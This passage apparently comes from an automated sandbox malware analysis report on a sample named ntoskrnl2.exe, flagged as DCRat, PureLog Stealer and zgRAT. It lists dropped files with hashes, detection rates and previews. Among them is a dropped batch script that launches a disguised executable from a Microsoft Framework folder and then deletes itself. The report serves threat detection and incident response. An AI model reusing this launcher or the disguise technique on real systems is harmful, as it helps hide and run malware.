                                                          WinPerfcommon.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            Udzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              loader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                hz7DzW2Yop.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  7aHY4r6vXR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                    0V2JsCrGUB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      FYKrlfQrxb.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        PlZA6b48MW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          C:\Recovery\GFIYCbjKVID.exeactive key.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                            Created / dropped Files

                                                                            C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                            Category:dropped
                                                                            Size (bytes):1430164
                                                                            Entropy (8bit):7.968311057541044
                                                                            Encrypted:false
                                                                            SSDEEP:24576:qQnFtu+zlSu7WlmZuTJ8BNTnCe2RmndNY2ncoC8OOGOFqZjkJe6QvX:Hpz7BNBNTnx2azxcoBrZS3fP
                                                                            MD5:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                                            SHA1:20E0CFFE94951E3201CA5AA3F5A2876B20408702
                                                                            SHA-256:6EBED9F6DE82360A3724C5148EAACED3273CE3E48826492D87DA9D7E978EB6FC
                                                                            SHA-512:B93AADA5CDF824C5FEB5C2A992A92CB929479241E7895C42C8A6AF32B11C72767523D4ABD641C44A0B2E310288E533F7AEEF3F1931023AC72154171BC83D2CC0
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 76%
                                                                            Joe Sandbox View:
                                                                            • Filename: active key.exe, Detection: malicious, Browse
                                                                            Preview:MZ......................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                                                            C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe:Zone.Identifier

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:true
                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                            C:\Program Files\Reference Assemblies\Microsoft\Framework\d899e5aa4a0be6

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):248
                                                                            Entropy (8bit):5.721702829922465
                                                                            Encrypted:false
                                                                            SSDEEP:6:SIDL7OI7F1im3QsnMoWqfKDM1rqQbKsqXNrRb1vvpH1+ayveYgM:SCPOIviMyD8xbKpNpH1zyveYv
                                                                            MD5:732D3AD5FFC4DADDF4F7DAE9CF84C04A
                                                                            SHA1:FAB55176C8C9FB9C17F27C88271C9D90E86DD5B9
                                                                            SHA-256:E4224A5E1C0BA3D065C3131EFA46B1E25DEFFD2A99B1EB3A26BD05C361DDF0A1
                                                                            SHA-512:88A2ED25F807E8F2E52F432E2609492DC3737CFB2335E73D3BE053EE92C50C7E52DD39EB544C72C38371893583676928B436F0142AB85B121B2BAB2E9AE83449
                                                                            Malicious:false
                                                                            Preview:bzrPuMfrRRFesB9GFfzN3h1jOI2BOeRppQawcGT9DxJzDSJJwFo4kHV47IBlUdcw9azclMn8MzKFYCf69sOJ0WEh4fyUFrojVW0ndqijbpsu7Pg5mEmlOS5mVRhFYT3fLkuBL2cSKprLoTkp92rAFDUCaORLJcLIwMjWfeuulTajlu7Br1Ggl2ZHPrl7kRJsdjZbuOKeI7YwmubpQPeRVog3wcGx3xJUJsFCVfRcrmXodnefQ5qUw2Wz

                                                                            C:\Recovery\GFIYCbjKVID.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                            Category:dropped
                                                                            Size (bytes):1430164
                                                                            Entropy (8bit):7.968311057541044
                                                                            Encrypted:false
                                                                            SSDEEP:24576:qQnFtu+zlSu7WlmZuTJ8BNTnCe2RmndNY2ncoC8OOGOFqZjkJe6QvX:Hpz7BNBNTnx2azxcoBrZS3fP
                                                                            MD5:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                                            SHA1:20E0CFFE94951E3201CA5AA3F5A2876B20408702
                                                                            SHA-256:6EBED9F6DE82360A3724C5148EAACED3273CE3E48826492D87DA9D7E978EB6FC
                                                                            SHA-512:B93AADA5CDF824C5FEB5C2A992A92CB929479241E7895C42C8A6AF32B11C72767523D4ABD641C44A0B2E310288E533F7AEEF3F1931023AC72154171BC83D2CC0
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 76%
                                                                            Joe Sandbox View:
                                                                            • Filename: active key.exe, Detection: malicious, Browse
                                                                            Preview:MZ......................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                                                            C:\Recovery\GFIYCbjKVID.exe:Zone.Identifier

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:false
                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                            C:\Recovery\d899e5aa4a0be6

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):218
                                                                            Entropy (8bit):5.753427089479823
                                                                            Encrypted:false
                                                                            SSDEEP:6:dVFOb0CoyufOEpnpBHdv9bBZ4U9BjxvBIdEK97JbXt:1bTO0VdLZ4qYJbXt
                                                                            MD5:DA5992B969799AA9EB7CE8EFACEC4E6D
                                                                            SHA1:B12A038024C3B8849D0ACA3A92F5EC8B130D37CB
                                                                            SHA-256:A2E9CF8AABF9244AB896AADF1CDAE4899A7667FF531D516AB85EAB6069399AF5
                                                                            SHA-512:B02B096F13AA9CB05552E70216425300DF0F0CD5D06F50C68EF79B631D3C52AEEA7EF9C41AF7FFC30D2BC7996E9F3EF6822227A5098ECDAF1AB0B968085096DB
                                                                            Malicious:false
                                                                            Preview:k5pMGzZUmYqYShyXqIXndYVMAVeQgHkOiRWOjlnLxIgBIqWycmFYpItLjcMuVJxexbzBLkyFeM0V2TET9px3CMjahLpGY3znUCOq0Vn2yA3cRXSPY2vqV4bk1ZdA5rqlXMB0FYcoC5FCTGIK2ZsfHJSaknyb1n7GTRFFWcK9aHoayZRvQTHg9KeN3kQbjAwZ88sBADxaOsFAf2lKWDLifaGJx1

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\GFIYCbjKVID.exe.log

                                                                            Download File
                                                                            Process:C:\Windows\Containers\GFIYCbjKVID.exe
                                                                            File Type:CSV text
                                                                            Category:dropped
                                                                            Size (bytes):1281
                                                                            Entropy (8bit):5.370111951859942
                                                                            Encrypted:false
                                                                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                            MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                            Malicious:false
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ntoskrnl2.exe.log

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:CSV text
                                                                            Category:dropped
                                                                            Size (bytes):1740
                                                                            Entropy (8bit):5.36827240602657
                                                                            Encrypted:false
                                                                            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKk+HKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKk+qZ4vtpv
                                                                            MD5:1152A0332636E97D888ECFF02C1B19A9
                                                                            SHA1:365D4052647A8B9BCC0512CBCFB12279316549FD
                                                                            SHA-256:C72695BD822EB0EB112850B84D7ABBD5BADF07C3A0A670422D9DA3620BAE6EB4
                                                                            SHA-512:9FFC281DBF24C21DDEC4BE93941339B7601AD12C24D11176668DBDFD0AD5826FDA463620BF9E129030D9119BF9A9E21C45A999F31249AA9BD65B85546783AD28
                                                                            Malicious:true
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):64
                                                                            Entropy (8bit):1.1510207563435464
                                                                            Encrypted:false
                                                                            SSDEEP:3:NlllulTkklh:NllUokl
                                                                            MD5:8F489B5B8555D6E9737E8EE991AA32FD
                                                                            SHA1:05B412B1818DDB95025A6580D9E1F3845F6A2AFC
                                                                            SHA-256:679D924F42E8FC107A7BE221DE26CCFEBF98633EA2454D3B4E0D82ED66E3E03D
                                                                            SHA-512:97521122A5B64237EF3057A563284AC5C0D3354E8AC5AA0DE2E2FA61BA63379091200D1C4A36FABC16B049E83EF11DBB62E1987A6E4D6A4BCD5DDB27E7BD9F49
                                                                            Malicious:false
                                                                            Preview:@...e................................................@..........

                                                                            C:\Users\user\AppData\Local\Temp\09VUCC0aBk.bat

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\ntoskrnl2.exe
                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):202
                                                                            Entropy (8bit):5.227235695978868
                                                                            Encrypted:false
                                                                            SSDEEP:6:hCRLuVFOOr+DEhygxLUfWJYZKOZG1923fr6FH:CuVEOCDErxLU1e9
                                                                            MD5:2E21859098B4741B5A392373F80D5CD2
                                                                            SHA1:E5B9C3D6D2C54FE1B5567BC6D41AEEA1BC0E12CD
                                                                            SHA-256:564B947F9E07424AEF6B21BA8BD5C9962B43052C2FEE516695B986CFF3D1F2A6
                                                                            SHA-512:1DBB4E4C2EA17806CDD38CF90B225DB6C292B0E83B7ECD158C677D420888404760C35090B116750F79DD1D620FF2337A5BACDCE350737623BB5F3D2E7F592747
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\09VUCC0aBk.bat"

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_050bydyy.btu.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41pevrzr.byu.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4lzh3b22.hlf.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_atytiy4b.4os.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bg4hg1ot.bbs.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dak3gp2v.40o.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eoq0jbmk.qhu.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_evqskz4v.bg4.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gezkwnkf.jty.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lc121ahj.rfb.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2vw4rup.jgu.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n0npknc2.src.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrbk1zm2.ek2.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwbxh25s.rfb.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
